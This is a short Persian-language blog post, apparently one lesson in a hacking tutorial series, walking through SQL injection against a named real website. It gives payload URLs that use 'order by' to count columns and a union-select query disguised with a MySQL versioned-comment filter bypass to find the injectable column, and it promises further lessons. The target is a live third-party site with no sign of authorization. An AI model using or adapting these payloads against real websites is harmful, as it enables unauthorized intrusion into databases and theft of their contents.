+--http://www.discover.com.pa/english/pa_index.php?id=31'+order+by+4

خوب در تارگت بالا همان طور که می بینید ما توسط دستور orderتعداد ستون ها رو بیرون کشیدیم البته به کمک بایپس

+--http://www.discover.com.pa/english/pa_index.php?id=-31'+/*!50000uNion+select*/+1,2,3,4

در این مرحله ما برای بیرون کشیدن ستون آسیب پذیر نیاز به پایپس داشتیم و از بایپسی که در جلسه قبلی به آن اشاره شده بود استفاده کردیم

فوق و پیروز باشید
با ادامه آموزش با ما همراه باشید

نوشته شده در تاریخ دوشنبه 19 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()